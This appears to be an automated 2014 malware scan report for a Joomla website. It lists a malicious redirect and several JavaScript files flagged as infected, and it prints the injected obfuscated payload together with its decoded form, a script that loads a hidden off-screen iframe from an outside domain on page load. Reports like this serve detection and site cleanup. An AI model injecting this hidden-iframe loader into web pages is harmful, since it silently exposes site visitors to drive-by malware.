Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://maunanet.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: maunanet.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 12 Sep 2014 01:41:28 GMT Location: http://mercurytutors.com/stats.php Server: Apache/2.2.3 (CentOS) Content-Length: 319 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://maunanet.net/ | 200 OK Content-Length: 16594 Content-Type: text/html | clean |
http://maunanet.net/media/system/js/caption.js | 200 OK Content-Length: 3153 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://maunanet.net/templates/hot_host/js/jquery.min.js | 200 OK Content-Length: 85552 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://maunanet.net/templates/hot_host/js/reflection.js | 200 OK Content-Length: 6070 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://maunanet.net/modules/mod_hot_joomla_carousel_pro/js/jquery.carousel.min.js | 200 OK Content-Length: 8548 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://maunanet.net/index.php | 200 OK Content-Length: 16594 Content-Type: text/html | clean |
http://maunanet.net/cast | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 12 Sep 2014 01:41:32 GMT Location: http://maunanet.net/cast/ Server: Apache/2.2.3 (CentOS) Content-Length: 310 Content-Type: text/html; charset=iso-8859-1 | clean |
http://maunanet.net/cast/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 12 Sep 2014 01:41:32 GMT Pragma: no-cache Location: http://maunanet.net/cast/login/index.php Server: Apache/2.2.3 (CentOS) Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: centovacast=n8ta05qrjichp14eujlnrolth4; path=/ X-Powered-By: PHP/5.1.6 X-Powered-By: PleskLin | clean |
http://maunanet.net/cast/login/index.php | 200 OK Content-Length: 1424 Content-Type: text/html | clean |
http://maunanet.net/cast/login/index.php?page=forgot | 200 OK Content-Length: 1291 Content-Type: text/html | clean |
http://maunanet.net/test404page.js | 404 Not Found Content-Length: 289 Content-Type: text/html | clean |
http://maunanet.net/index.php?option=com_content&view=article&id=36&Itemid=201 | 200 OK Content-Length: 20339 Content-Type: text/html | clean |
http://maunanet.net/index.php?view=article&catid=14%3Aradio-streaming&id=36%3Acentovacast-el-panel-de-control-de-emisora-profesional&format=pdf&option=com_content&Itemid=201 | 200 OK Content-Length: 243608 Content-Type: application/pdf | clean |
http://maunanet.net/index.php?view=article&catid=14%3Aradio-streaming&id=36%3Acentovacast-el-panel-de-control-de-emisora-profesional&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=201 | 200 OK Content-Length: 10584 Content-Type: text/html | clean |
http://maunanet.net/index.php?option=com_mailto&tmpl=component&link=80122174486261368a49489923a98029f8f17da9 | 200 OK Content-Length: 2673 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=maunanet.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://maunanet.net/
Result: maunanet.net is not infected or malware details are not published yet.
Result: maunanet.net is not infected or malware details are not published yet.